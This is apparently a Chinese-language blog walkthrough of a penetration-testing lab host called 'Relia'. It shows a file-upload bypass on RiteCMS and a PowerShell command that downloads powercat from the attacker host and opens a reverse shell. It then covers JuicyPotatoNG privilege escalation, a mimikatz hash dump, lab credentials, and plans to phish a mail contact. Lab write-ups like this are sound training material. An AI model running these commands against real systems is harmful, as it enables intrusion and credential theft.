Challenge 2 - Relia(5)

 Challenge 2 - Relia(5)

下一個目標是第五台,選定的機器是對外的 192.168.xxx.249



Rustscan,└─$ rustscan -a 192.168.188.249 --scripts none --ulimit 5000 | tee rustscan



snmp 沒有開,└─$ sudo nmap -sU -p 161 192.168.188.249 | tee snmp



nmap,└─$ sudo nmap -sCV -A -p 80,135,139,445,3389,5985,8000,47001,49664,49665,49666,49667,49668,49669 192.168.188.249 | tee nmap

80/tcp    open  http          Microsoft IIS httpd 10.0

3389/tcp  open  ms-wbt-server Microsoft Terminal Services

|   NetBIOS_Domain_Name: LEGACY --> 這台伺服器名稱是 LEGACY

8000/tcp  open  http          Apache httpd 2.4.54 ((Win64) OpenSSL/1.1.1p PHP/7.4.30)

| http-title: Welcome to XAMPP --> 熟悉的 XAMPP



enum4linux,└─$ enum4linux -a  192.168.188.249 | tee enum4linux                                 



80 /



80 /robots.txt



80 gobuster



8000 /



8000 /phpmyadmin



8000 /phpinfo.php 發現使用者帳號 adrian



8000 gobuster



8000 /cms/



gobuster 8000 /cms



8000 /cms/admin.php



admin:admin 登入成功,RiteCMS v3



searchsploit RiteCMS



版本是 v3 又要 RCE 直接看 50616,https://www.exploit-db.com/exploits/50616

看來可以上傳檔案,改一下 *.php 為 *.pHp 即可



還有步驟給你參考



依據步驟上傳 php-reverse-shell.pHP 到 files 目錄



執行 http://192.168.188.249:8000/cms/files/php-reverse-shell.pHP

Reverse Shell 有進來但是馬上斷掉

原因應該是使用的 PHP 檔案主要提供給 Linux 用,這一台是 Windows 主機



改上傳最好用的 webshell.pHp 並執行 whoami 看來是成功的



執行 powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.236/tools/powercat.ps1'); powercat -c 192.168.45.236 -p 4444 -e powershell"

這一次成功拿到 Reverse Shell,whoami 使用者是 adrian,直接拿 local.txt



開始 PE,whoami /priv 發現爛梗 SeImpersonatePrivilege Enabled


標準作業上傳 nc64.exe、JuicyPotatoNG.exe 提權



4445 進來了,whoami 確認是管理者,查找 proof.txt 一樣不在 administrator 目錄

而是在使用者 damon 的桌面,看來後續一樣要枚舉



先更新攻擊順序表,順利拿下第五台機器



執行 mimikatz.exe 拿 HASH,administrator:387aef0561b65e4f3cae0960b0fba2d5



adrian:e3cea06e2de8d54d43b84d4b5bffb5b0



damon:820d6348890893116880101307197052



更新帳號密碼表



枚舉發現 Powershell History 有一組帳號密碼,damon 是 administrators 群組成員

damon:i6yuT6tym@



impacket-psexec 測試有效,└─$ impacket-psexec damon:'i6yuT6tym@'@192.168.188.249


後續枚舉在 damon 目錄發現 .gitconfig 設定



Git 設定在 c:\staging



切換到 c:\staging 然後 dir 查看沒有東西,使用 dir /a 列舉隱藏檔果然發現 .git 目錄



Git 標準第一步驟 git status 發現沒有權限

執行 git config --global --add safe.directory C:/staging 給予權限再跑一次就可以正常執行了



Git 標準第二步驟 git log,又發現一個使用者帳號 damian



Git 標準幣三步驟 git show

-Email configuration of the CMS

-maildmz@relia.com:DPuBT9tGCBrTbR

發現一組帳號密碼 maildmz@relia.com:DPuBT9tGCBrTbR

另外這兩句話是一個重點

-If something breaks contact jim@relia.com as he is responsible for the mail server. 

-Please don't send any office or executable attachments as they get filtered out for security reasons.

告知如果有問題請你寄信給 jim@relia.com
但不可以寄出任何 Office 文件或是執行檔因為會被過濾掉 



先更新一下帳號密碼表再來整理一下目前相關的資訊

 - Powershell 歷史獲得 LEGACY\damon 的密碼 "i6yuT6tym@" 且測試有效

 - git log 多獲得一組帳號 damian

 - git show 發現一組 CMS 設定的 SMTP 帳號密碼 maildmz@relia.com:DPuBT9tGCBrTbR

 - Relia 公司的郵件負責人郵件地址 jim@relia.com



截至目前為止總共打下外網 192.168.xxx.0/24 的機器共 5 台

其中 2 台 Linux、3 台 Windows 且都沒有加入網域,每一台都只有一張網卡

沒有找到任何契機可以進到 Relia 公司內網

雖然對外還有兩台 .189 & .191 ,這兩台沒有在攻擊前面的順序是因為已經打過

發現打不下來所以才沒有列在攻擊順序前面的清單中,但確實已經花了不少時間測試

在 .189 的測試中有發現 25 Port SMTP 郵件服務,但沒有任何 Exploit

直到打到 .249 這一台後發現上述的那一段話可以寄信給 jim@relia.com 給了新的契機

再加上拿到 maildmz@relia.com:DPuBT9tGCBrTbR 且後續使用 crackmapexec 對 .189 驗證如下


看來 maildmz@relia.com 是我們拿到的第一個 Relia 網域有效憑證

所以後續會將重點放回到郵件社交攻擊,這一篇先到此結束


留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)